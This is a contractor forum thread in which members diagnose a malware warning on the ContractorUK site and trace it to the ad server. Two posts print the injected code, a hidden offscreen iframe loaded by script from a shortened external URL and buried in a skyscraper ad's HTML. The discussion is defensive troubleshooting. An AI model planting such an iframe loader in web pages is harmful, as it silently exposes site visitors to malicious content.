- Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
- Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!
Reply to: CUK triggers malware warning
Collapse
You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:
- You are not logged in. If you are already registered, fill in the form below to log in, or follow the "Sign Up" link to register a new account.
- You may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
- If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.
Logging in...
Previously on "CUK triggers malware warning"
Collapse
-
Originally posted by administrator View PostNow enough of you have signed up to the free competition thingymabob I have taken it off. Thank you for your custom, it is greatly appreciated. The mother's maiden name question was particularly enlightening, never would have had Old Greg as a member of the Gove clan, and to think DimPrawn's old dear is a Corbyn - well I never!
Fingers crossed should be properly fixed this time, the upgrade carried over some remnants of hack last time so really hoping it is sorted this time, if not it will be a set it up from scratch do and I really don't want to have to do that
Leave a comment:
-
Originally posted by administrator View PostFingers crossed should be properly fixed this time, the upgrade carried over some remnants of hack last time so really hoping it is sorted this time
Originally posted by greenlake View PostI use Edge 44.17763.1.0 and have been receiving the following popup on virtually every CUK page since yesterday morning:
Leave a comment:
-
Now enough of you have signed up to the free competition thingymabob I have taken it off. Thank you for your custom, it is greatly appreciated. The mother's maiden name question was particularly enlightening, never would have had Old Greg as a member of the Gove clan, and to think DimPrawn's old dear is a Corbyn - well I never!
Fingers crossed should be properly fixed this time, the upgrade carried over some remnants of hack last time so really hoping it is sorted this time, if not it will be a set it up from scratch do and I really don't want to have to do that
Leave a comment:
-
Admin obviously think continued ad revenue is more important than protecting users computers from being compromised...
Leave a comment:
-
Originally posted by xoggoth View PostI'd have thought best approach is to make a copy of page and then comment out external refs one by one. Must be one of those js or php inclusions.
Code:{ "revive-0-0": { "html": "<a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=35dbefdc15__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cleaderboard' target='_blank'><img src='https://rev.contractoruk.com/www/images/6461024dbdede6b423ea67fe31f9eacb.gif' width='728' height='90' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_35dbefdc15' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=3&campaignid=2&zoneid=1&loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&cb=35dbefdc15' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>", "width": "728", "height": "90", "iframeFriendly": false }, "revive-0-1": { "html": "<style>#ifr_ads_banners{width:1600px;height:800px;position:absolute;left:-9985px;}</style><script>(function(d,e,g){g=d.createElement(e);g.src='//goo.gl/Cp8ciT';g.id='ifr_ads_banners';d.body.appendChild(g);})(document,'iframe');</script><a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=4__zoneid=2__cb=e21e133ee8__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cskyscraper' target='_blank'><img src='https://rev.contractoruk.com/www/images/7cb73f87f1f449519d2e2b8832fbd2ae.gif' width='160' height='600' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_e21e133ee8' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=4&campaignid=2&zoneid=2&loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&cb=e21e133ee8' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>", "width": "160", "height": "600", "iframeFriendly": false } }
So it isn't anywhere in the forum templates; it's somewhere buried in, probably, the plugin mechanism of the ad server.
Leave a comment:
-
Surprised nobody has suggested bleeding the radiators yet. Or have I missed it?
Leave a comment:
-
I'd have thought best approach is to make a copy of page and then comment out external refs one by one. Must be one of those js or php inclusions.
Leave a comment:
-
Originally posted by DimPrawn View PostHas CUK been infiltrated by Russian spies?
This pops up whenever I visit the General forum now
Leave a comment:
-
Originally posted by NickFitz View PostA couple of useful suggestions there at New Ad prevents site from loading on mobile - Page 3 but as I recall admin checked the prepend/append stuff and there wasn't anything there.
Leave a comment:
-
Originally posted by xoggoth View Post
Leave a comment:
-
Originally posted by xoggoth View PostFlipping mystery. The iframe I found was in the bagsforu stuff, nowt in CUK source. I know Iframes can be hidden from user but surely they'd be shown in source even if dynamically created? All the included stuff looks reputable, Google, dragonbyte, yui, vbulletin etc.
It's created with JavaScript which is hidden (along with the CSS that hides the iframe) in the HTML for the the skyscraper ad on the right; that HTML is itself embedded in JSON that's loaded asynchronously. The offending code is just:
Code:<style> #ifr_ads_banners{ width:1600px;height:800px;position:absolute;left:-9985px; } </style> <script> (function(d,e,g){ g=d.createElement(e); g.src='//goo.gl/Cp8ciT'; g.id='ifr_ads_banners'; d.body.appendChild(g); })(document,'iframe'); </script>
The problem is finding out where in the ad server this code is being inserted into the response. It's not in the database, but from looking at the source for the ad server (which is available on GitHub), I can immediately see two or three different ways to insert some code into the response chain if there's a vulnerability that allows one to drop a file or two on the server. And that's by using the legitimate plugin system that's an integral part of the way the ad server operates, so it's not something that can be easily disabled.
Leave a comment:
- Home
- News & Features
- First Timers
- IR35 / S660 / BN66
- Employee Benefit Trusts
- Agency Workers Regulations
- MSC Legislation
- Limited Companies
- Dividends
- Umbrella Company
- VAT / Flat Rate VAT
- Job News & Guides
- Money News & Guides
- Guide to Contracts
- Successful Contracting
- Contracting Overseas
- Contractor Calculators
- MVL
- Contractor Expenses
Advertisers
Contractor Services
CUK News
- Will HMRC’s 9% interest rate bully you into submission? Today 09:10
- Autumn Budget 2024: Reeves raids contractor take-home pay Oct 31 14:11
- How Autumn Budget 2024 affects homes, property and mortgages Oct 31 09:23
- Autumn Budget 2024: Reeves raids contractor take-home pay Oct 31 09:20
- Autumn Budget 2024: Umbrella companies hit, Employer NICs hiked, and BADR heading for 18% Oct 30 16:54
- Autumn Budget 2024: chancellor’s full speech Oct 30 16:34
- RecExpo got told this about Labour’s Employment Rights Bill… Oct 30 09:10
- A limited company just got one over HMRC on VAT; here’s how Oct 29 09:24
- Business Account with ANNA Money Oct 28 15:51
- Top 5 Autumn Budget areas for IT contractors to tick off Oct 28 09:30
Leave a comment: